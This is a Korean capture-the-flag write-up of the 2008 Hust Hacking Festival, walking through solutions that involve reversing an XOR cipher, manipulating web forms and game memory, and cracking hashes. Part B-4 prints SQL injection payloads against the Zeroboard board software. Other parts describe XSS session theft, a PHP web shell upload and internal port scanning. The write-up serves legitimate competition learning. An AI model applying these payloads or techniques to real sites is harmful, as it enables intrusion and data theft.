=====================================
< Hust Hacking Festival 2008 Report > by hkpco(박찬암)
-------------------------------------
mail - chanam.park@hkpco.kr
homepage - http://hkpco.kr/
=====================================
대회 참가 아이디 - newheart
-------------------------------------
"I am so sorry!"
대회 참여자는 모두 입상을 염두하고 중간중간 스크린샷을 찍으라는 명시가 되어 있지만 대회 기간 내내 너무 정신이 없던 탓에 한 장 밖에 찍지 못했습니다. 더군다나 단지 문제 구경을 위하여 살펴보다가 중간에 갑작스런 흥미로 뒤늦은 참여를 시작하게 된 덕분에 로그조차 남길 마음의 여유가 없었던 것 같습니다. 대회 기록이 많이 부족한 점 양해 부탁드립니다.

Part A - 1
특정 권한의 공지 글을 읽는 문제입니다. 레벨 변경 페이지가 존재하며 level 1 ~ 5 까지의 버튼이 있습니다. level1이 되어야 패스워드가 담긴 글을 읽을 수 있는데, 현재 권한은 level5로 되어있기 때문에 이를 변경해야 합니다. level2 까지는 간단히 변경이 가능하지만 level1은 관리자 만이 바꿀 수 있도록 구성되어 있기 때문에 다른 방법을 써야합니다. 일반 게시판이 보이길래 XSS로 관리자의 쿠키 혹은 세션을 가져오거나, CSRF 공격을 통하여 특정 계정의 레벨 변경을 시도하도록 공격해 보았지만 생각처럼 잘 되지 않았습니다. 다양한 시행착오 끝에 글 열람 시 다음과 같은 취약한 레벨 체크 코드를 유추해 낼 수 있었습니다.
--
if( $level < 2 ) { echo "인증 성공"; } else { echo "인증 실패"; }
--
즉, 조건문의 잘못된 사용으로 인해 level이 1이 아니어도 그 이하인 경우 또한 글 열람이 가능해 지는 것입니다. 레벨 변경 페이지에서 웹 프록시를 통하여 현재 레벨을 1 이하로 설정한 뒤 글을 열람하였으며 패스워드를 획득할 수 있었습니다.

Part A - 2
텍스트 파일의 내용을 암호화 시켜주는 윈도우 바이너리와 이를 통해 암호화 된 패스워드 파일이 주어집니다. 특정 파일을 지정해 주면 암호화를 수행한 뒤 파일을 생성하여 암호문을 저장해 줍니다. 해당 암호화 루틴은 WriteFile() API를 역으로 추적하여 찾을 수 있었습니다. 다음과 같습니다(주석 추가).
--
.text:004014B9 mov ecx, ebp ; ecx = file size
.text:004014BB sub edx, ebp
.text:004014BD mov edi, esi ; edi = filesize
.text:004014BF
.text:004014BF loc_4014BF: ; CODE XREF: .text:004014D9j
.text:004014BF mov al, [edx+ecx] ; al = edx+ecx
.text:004014BF ; ecx -> cnt
.text:004014BF ; edx -> plain text
.text:004014BF ;
.text:004014C2 xor al, bl ; al = al ^ bl
.text:004014C4 mov [ecx], al ; [ecx] = al;
.text:004014C6 and eax, 0FFh ; eax = eax & 0xff
.text:004014CB shr ebx, 8 ; ebx = ebx >> 8
.text:004014CE mov eax, dword_4190B0[eax*4] ; eax = 4190b0[eax*4]
.text:004014D5 xor ebx, eax ; ebx = ebx ^ eax
.text:004014D7 inc ecx ; ecx++
.text:004014D8 dec edi ; edi--
.text:004014D9 jnz short loc_4014BF ; al = edx+ecx
.text:004014D9 ; ecx -> cnt
.text:004014D9 ; edx -> plain text
--
xor을 수행하는것을 알 수 있으며 키 테이블은 다음 주소에 저장됩니다.
--
004190B0 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 ....?w,aîºQ. . . .
--
암호 루틴을 C언어로 나타내면 다음과 같습니다.
--
#define MAX 4096
int main( void ) {
    int cnt;
    char ch;
    char str[MAX];
    char x_table[] = { 0x00, 0x00, 0x00, 0x00, 0x96, 0x30, 0x07, 0x77 .. ... ... ... };
    unsigned long ebx = 0xA9D4FB79;
    for( cnt = 0 ; cnt < MAX ; cnt++ ) {
        ch = str[cnt];
        ch = ch ^ (ebx&0xff);
        printf( "%c", ch );
        fflush(stdout);
        ebx = ebx >> 8;
        ch = x_table[ch*4];
        ebx = ebx ^ ch;
    }
    return 0;
}
--
xor은 같은 값으로 두 번 연산하게 되면 원래의 값으로 돌아오는 특징이 있습니다. 그래서 암호화 루틴을 유추하여 따로 복호화 루틴을 작성할 필요가 없습니다. 문제에서 주어진 파일을 복호화 하여 다음과 같은 패스워드를 얻을 수 있습니다.
--
[hkpco@hkpco HUST]$ ./hk_dec < password.txt
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
인증값 : 38d9587b9be0bd19be5dcb109f023504
!@%!@!@#^*!@#^(!@^(!@)^!@^!@^(!^$%($^#$^%(%#^(%#(^^#(@%#(^@%^
$(_(*^%$$%*()($#$%^&*()&^%$#$%^&*)(*&^%$%^&*((*&%$#$%^&*()(**
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
&&()*&&%&$#%^&*()$)*$%#^*#()@)@&$%^^@*($)$%#*$@&@*@)@$($@*$*
$#!$@#*@#*%%@#*@#$*$@#*$@#**&*(*(%#@!%!@#^#!@&$#@&#%*&@&@#$&
--

Part A - 3
sQuest.jar 이라는 파일이 주어지며 자바로 작성된 서버 파일 같았습니다. 묶여있는 파일을 풀어서 자바 디컴파일러를 이용하여 코드를 살펴보던 도중 Client.class 파일에서 서버 접속 관련 정보를 얻을 수 있었습니다.
--
. .
public Client() {
    Socket socket1;
    socket1 = null;
    try {
        socket1 = new Socket("220.95.152.32", 9000);
        DataInputStream datainputstream = new DataInputStream(socket1.getInputStream());
        DataOutputStream dataoutputstream = new DataOutputStream(socket1.getOutputStream());
        BufferedReader bufferedreader = new BufferedReader(new InputStreamReader(System.in));
        (new ListenThread(datainputstream)).start();
        System.out.println("ready!!");
        do {
            String s = bufferedreader.readLine();
            if(s.equalsIgnoreCase("quit"))
                System.exit(0);
. . .
--
서버 주소는 220.95.152.32 이며 포트는 9000 이었습니다. 서버에 접속하여 문자열을 보내면 특정 규칙으로 인코딩 되었는데 간단한 작업이기 때문에 수동으로 직접 각 문자에 매핑되는 문자를 찾아 내었습니다.
--
A -> C
B -> E
C -> H
D -> L
E -> K
. .
V -> G
W -> B
X -> O
Y -> S
Z -> V
--
서버에 접속하면 인코딩 된 문자열로 예상되는 불규칙적인 7bytes의 스트링을 출력해 주는데, 이에 대한 평문을 다시 전송하면 어떠한 응답이 올 것으로 예상하고 다음과 같이 간단한 코딩을 하였습니다.
--
/* hkpco ChanAm Park */
#include
#include
#include
#include
#include
#include
#include
#include
#include
int sock_conn( char **argv );
int err( char *msg );

int main( int argc , char **argv ) {
    int sockfd;
    char buffer[1024] = {0x00,};
    char *p = buffer;
    char table[] = {'C','E','H','L','K','M','A','Y','T','D','X','R','Z', 'U','I','Q','N','P','J','F','W','G','B','O','S','V'};
    char key[16] = {0x00,};
    int cnt, cnt_in;
    if( argc < 3 ) {
        fprintf( stderr, "%s [server] [port]\n", argv[0] );
        return -1;
    }
    sockfd = sock_conn( argv );
    memset( buffer, 0x0, sizeof(buffer) );
    read( sockfd, buffer, sizeof(buffer) );
    printf( "%s\n", buffer );
    printf( "%s\n", p+7 );
    for( cnt = 0 ; cnt < 7 ; cnt++ ) {
        for( cnt_in = 0 ; cnt_in < sizeof(table) ; cnt_in++ ) {
            if( *(p+7+cnt) == table[cnt_in] ) {
                printf( "%c\n", 'A'+cnt_in );
                key[cnt] = 'A'+cnt_in;
            }
        }
    }
    printf( "key: %s\n", key );
    write( sockfd, key, strlen(key) );
    memset( buffer, 0x0, sizeof(buffer) );
    read( sockfd, buffer, sizeof(buffer) );
    printf( "last rcv: %s\n", buffer );
    close(sockfd);
    return 0;
}

int sock_conn( char **argv ) {
    int sockfd;
    struct sockaddr_in sock;
    struct hostent *host_st;
    sockfd = socket( PF_INET, SOCK_STREAM, 0 );
    if( sockfd < 0 )
        err( "socket()" );
    host_st = gethostbyname( argv[1] );
    if( host_st == NULL )
        err( "gethostbyname()" );
    bzero( sock.sin_zero, sizeof(sock.sin_zero) );
    sock.sin_family = AF_INET;
    sock.sin_port = htons(atoi(argv[2]));
    sock.sin_addr = *((struct in_addr *)host_st->h_addr);
    if( connect( sockfd, (struct sockaddr *)&sock, sizeof(sock) ) < 0 )
        err( "connect()" );
    return sockfd;
}

int err( char *msg ) {
    perror(msg);
    exit(-1);
}
--
실행한 결과 NEXT : solution 이라는 메시지를 전달받을 수 있었으며 이 때 전달한 평문이 인증 패스워드가 되었습니다.

Part A - 4
Ajax로 코딩 된 계좌 이체 페이지가 주어졌습니다. 그런데 웹 프록시로 확인해 본 결과 이체 버튼을 클릭하여도 이체 실패라는 경고창만 뜰 뿐 어떠한 submit도 이루어지지 않는 것을 알 수 있었습니다. 웹 페이지의 소스 코드를 보면 JScript.Encode가 되어 있기 때문에 원래의 소스 코드를 볼 수 없는데, 이는 다양한 툴이나 웹상에서 제공하는 디코딩 서비스를 이용하면 쉽게 복호화 할 수 있습니다. 계좌 이체 페이지의 submit 코드는 다음과 같습니다.
--
    . .
--
버튼을 클릭하면 fcInputBtn();이 호출되며 해당 코드는 다음과 같습니다.
--
function fcInputBtn() {
    document.fInput.action = 'chivasRegal.html';
    window.alert('이체 실패!');
}
--
기존 makgurlri.php에서 chivasRegal.html로 action을 바꾸어 주는것을 볼 수 있으며 실제 form의 action 또한 chivasRegal.html로 변경하여 submit되도록 수정하였습니다. 시간이 꽤 걸릴법한 복잡한 수식을 패스워드라고 출력해 주었으며 짧은 시간마다 바뀌어서 처음에는 문제에서 출력해 주는 복잡한 수식을 위한 문제 전용 계산 코드를 작성하였지만, 결국 이러한 작업이 필요하지 않다는 것을 알게되었습니다. 패킷 캡쳐 결과에서 패스워드를 출력해주는 페이지가 포함되어 있었으며 사용자에게 입력을 받는 인증 패스워드와 OPT 값은 아무 상관이 없는것으로 보였습니다. 패스워드는 "By doubting we come at the truth" 입니다.

Part B - 1
시, 분, 초, 밀리초를 표시해 주는 타이머가 각각 세 개가 존재하는 윈도우 바이너리가 주어졌습니다. ollydbg로 살펴본 결과 각 시간 단위마다 다음과 같은 비교 구문을 거쳤습니다(ollydbg로 본 코드).
--
. .
0040163E > \BF 3C000000 mov edi, 3C ; Default case of switch 004015EA
00401643 > 8B4E 70 mov ecx, dword ptr ds:[esi+70]
00401646 . B8 74000000 mov eax, 74
0040164B . 3BC8 cmp ecx, eax
0040164D . 75 1D jnz short timer.0040166C
0040164F . 837E 74 70 cmp dword ptr ds:[esi+74], 70
00401653 . 75 17 jnz short timer.0040166C
00401655 . 837E 78 72 cmp dword ptr ds:[esi+78], 72
00401659 . 75 11 jnz short timer.0040166C
0040165B . 3946 6C cmp dword ptr ds:[esi+6C], eax
0040165E . 75 0C jnz short timer.0040166C
00401660 . 53 push ebx
00401661 . 53 push ebx
00401662 . 68 50304000 push timer.00403050 ; ASCII "You are around solution"
00401667 . E8 D2040000 call
. . .
--
타이머 시간의 비교 조건을 만족하면 다음과 같은 루틴을 거치게 됩니다(ida로 본 코드).
--
.text:00401280 sub_401280 proc near ; DATA XREF: .rdata:004025ACo
.text:00401280
.text:00401280 arg_0 = dword ptr 4
.text:00401280
.text:00401280 push esi
.text:00401281 mov esi, ecx
.text:00401283 push edi
.text:00401284 mov edi, [esp+8+arg_0]
.text:00401288 lea eax, [esi+6Ch]
.text:0040128B push eax
.text:0040128C push 3EDh
.text:00401291 push edi
.text:00401292 call ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:00401297 lea ecx, [esi+70h]
.text:0040129A push ecx
.text:0040129B push 3E8h
.text:004012A0 push edi
.text:004012A1 call ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:004012A6 lea edx, [esi+74h]
.text:004012A9 push edx
.text:004012AA push 3EBh
.text:004012AF push edi
.text:004012B0 call ?DDX_Text@@YGXPAVCDataExchange@@HAAI@Z ; DDX_Text(CDataExchange *,int,uint &)
.text:004012B5 lea eax, [esi+78h]
.text:004012B8 push eax
.text:004012B9 push 3ECh
. . .
--
이전에 비교한 타이머의 시각들이 DDX_Text의 인자로 전달되는데, 함수 호출 순서가 아닌 두 번째 인자(에디트 컨트롤 ID) 순으로 아스키 코드를 정렬하면 "tprtlgyflsla" 이라는 문자열을 구할 수 있으며 이것이 패스워드가 됩니다.

Part B - 2
테트리스 게임이 주어지며, 게임 내에 포함 된 이미지대로 블럭을 쌓으면 패스워드를 나타내 주는것으로 보였습니다. 이는 현재 블럭 상태 정보를 저장하여 주는 메모리 영역을 그림대로 변경하면 되며 조건이 만족하였을 경우 패스워드가 짧은 시간 간격으로 한 문자씩 보여지기 때문에 블록 상태 정보를 따로 저장해 두지 않으면 순간적으로 지나가는 문자들을 놓칠 수 있으므로 이는 따로 저장해 두는 것이 좋습니다. 게임에서 주어지는 그림과 동일한 블럭의 상태 정보는 다음과 같습니다.
--
02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00
. . .
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02
--
인증키는 한 문자씩 나타나며 이를 나열해 보면 "BE5tP4SVxA5Lki18" 라는 패스워드를 구할 수 있습니다.

Part B - 3
라우터 접속 시 화면의 스크린 샷을 보여주며 이를 통해 패스워드를 알아내는것이 문제입니다. root 계정 패스워드의 hash 값이 포함되어 있었고, 웹에서 제공되는 시스코 라우터 관련 크랙 서비스를 통하여 복호화 할 수 있었습니다. 패스워드는, "CAFEamericano!!"

Part B - 4
제로보드 게시판 3개와 비밀글 2개가 존재하는 페이지가 주어졌습니다. 비밀글은 write_ok.php에서 글 삭제 시 사용되는 $del_queX 변수를 조작하면 읽을 수 있으며 취약 부분의 php 코드는 다음과 같습니다.
--
@mysql_query("update $t_board"."_$id set headnum='$headnum',prev_no='$prev_no',next_no='$next_no', child='$child',depth='$depth',arrangenum='$arrangenum',father='$father',name='$name',email='$email', homepage='$homepage',subject='$subject',memo='$memo',sitelink1='$sitelink1',sitelink2='$sitelink2', use_html='$use_html',reply_mail='$reply_mail',is_secret='$is_secret', category='$category' $del_que1 $del_que2 where no='$no'") or error(mysql_error());
--
여기서 가장 마지막 부분의 $del_que1을 이용하여 공격을 시도하였습니다. 비밀글은 다음과 같이 볼 수 있습니다.
--
, memo=(select memo from zetyx_board_bOarD_1 where no=게시글번호)
--
두 개의 비밀글 내용은 각각 "TABLE NAME", "721f214d3c9de37d58a5b38c55e651c7" 이었으며, 새로운 공격을 시도해야 하는것으로 보였습니다. 해당 취약점을 이용하여 information_schema db를 살펴본 결과 721f214d3c9de37d58a5b38c55e651c7 테이블을 포함하는 database 이름을 알아낼 수 있었습니다. 721f214d3c9de37d58a5b38c55e651c7 테이블을 포함하는 db 이름은 bIgBaNG 이며, 각각의 컬럼 이름은 P, A, SS, W, O, R, D 라는 것을 알 수 있습니다. 각 필드값은 다음과 같이 추출하였습니다.
--
, memo=(select P from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7)
, memo=(select A from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7)
, memo=(select SS from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7)
, memo=(select W from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7)
, memo=(select O from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7)
, memo=(select R from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7)
, memo=(select D from bIgBaNG.721f214d3c9de37d58a5b38c55e651c7)
--
이렇게 구한 최종적인 문자열을 나열하면 "m@ket0d4yth3b3Std@y0fy0Url!F3"라는 패스워드를 구할 수 있습니다.

Part C - 1
네트워크상에 돌아다니는 패킷들을 캡쳐한 것으로 보이는 16진수 코드들이 주어졌습니다. 데이터 부분으로 추측되는 영역에 문자로 나타낼 수 있는 범위의 연속된 16진수들이 보였으며 이를 각각 문자로 변환하면 "PASS qksrkqtmqslek" 라는 문자열을 얻을 수 있습니다. 패스워드는, "qksrkqtmqslek" 입니다.
Part C - 2
게시판이 주어졌으며 빨강색으로 표시 된 "이게 정답이 맞나요??"라는 제목의 읽을 수 없는 글이 존재하였습니다. 풀이는 간단한 XSS를 통하여 세션값을 훔쳐오는 방법으로 가능하였지만 상당히 오랜 시간이 걸렸던 문제로 생각됩니다. XSS 취약성을 의도한 문제라면 자동화 작업을 해 놓아야 하는데 그렇지 못한것으로 보였으며 관리자 세션을 받기가 상당히 어려웠습니다. 그리고 일반 사용자도 글을 읽을 수 있었기 때문에 XSS를 통해 document.cookie 값을 저장해 놓은 파일에는 여러 세션이 뒤섞여 있었고 문제에서 관리자 세션을 일반 사용자의 세션과 동일한 형태로 만들어 놓았기 때문에 구분을 할 수가 없었습니다. 일반 사용자가 게시글을 읽을때 제한을 두거나 관리자 세션 형태를 조금 특별하게 구성해 두었더라면 하는 아쉬움이 많이 남았습니다. 아무튼, 게시글 수정 시 XSS 코드를 필터링 없이 삽입할 수 있는 취약점을 통하여 관리자 세션을 얻을 수 있었으며 해당 세션을 통해 게시글을 열람하여 패스워드를 획득할 수 있었습니다.

Part C - 3
패킷 캡쳐 파일인 aracode.pcap가 주어졌습니다. wireshark를 통해 살펴본 결과 FTP 통신이 이루어 진것을 볼 수 있었고, 데이터가 오가는 과정을 따로 파일로 저장하여 패스워드가 저장된 압축 파일 두개를 만들 수 있었습니다. 하지만 압축 파일에 패스워드가 걸려있었기 때문에 이를 풀어야 했는데, 단순한 무차별 대입 공격으로는 알아낼 수 없었습니다. 그래서 Advanced ZIP Password Recovery라는 툴을 이용하여 사전 파일을 이용한 무차별 대입으로 압축 파일의 패스워드를 얻어냈습니다. 압축을 풀면 텍스트 파일 하나와 그림 파일 하나가 존재하는데, 텍스트 파일에 적힌 숫자를 그림 파일에서 보여주는 아스키 코드표에 대응하여 문자를 추출해 내면 "woongkang" 이라는 패스워드를 얻을 수 있습니다.

Part C - 4
문제를 위해 제작된 사이트가 주어졌습니다. 게시판의 파일 업로드 취약성을 이용하여 php3 등의 확장자로 php 파일을 업로드 한 뒤, 업로드 디렉토리를 유추해서 쉘 권한을 획득할 수 있습니다. 추가적으로 게시판의 db 정보가 담긴 파일을 읽으므로 인해 sql 정보 까지 모두 열람이 가능하였습니다. 하지만 서버 내의 정보를 아무리 뒤져도 레벨 패스워드와 관련된 데이터를 찾을 수 없어서 내부 서버에 취약점이 있는 것으로 판단하였습니다.
ifconfig 명령을 이용하여 192.168.200.10라는 내부 서버를 찾을 수 있었지만 어느정도 살펴본 결과 현재 쉘을 획득한 서버와 동일한 서버라는것을 알 수 있었습니다. 그래서 오래전에 만들어 둔 ipscan 기능이 포함된 스캐너를 이용하여 내부 서버를 조사하였으며 192.168.200.11 라는 서버가 존재한다는 것을 알아낼 수 있었습니다. 다음은 포트 스캔 결과입니다.
--
hkscan -> portscan -> 192.168.200.11
loc-srv [135]
NoName [3389]
--
Windows의 RPC 서비스로 추측되는 135 포트와, 원격 제어를 위한 포트로 추측되는 3389 포트가 열려있는 것을 확인하였습니다. 포트 포워딩을 생각하였지만 다른 문제 풀이때문에 나중으로 미루었고, 이후에 포트 리다이렉션(생각했던것과 같은 의도)이라는 힌트가 제공되었습니다. 마지막 1시간을 남겨두고 사용자 계정에서 포트 리다이렉션을 수행하는 툴을 찾다가 실패하여 ssh 터널링을 시도하는 도중에 대회가 끝났습니다.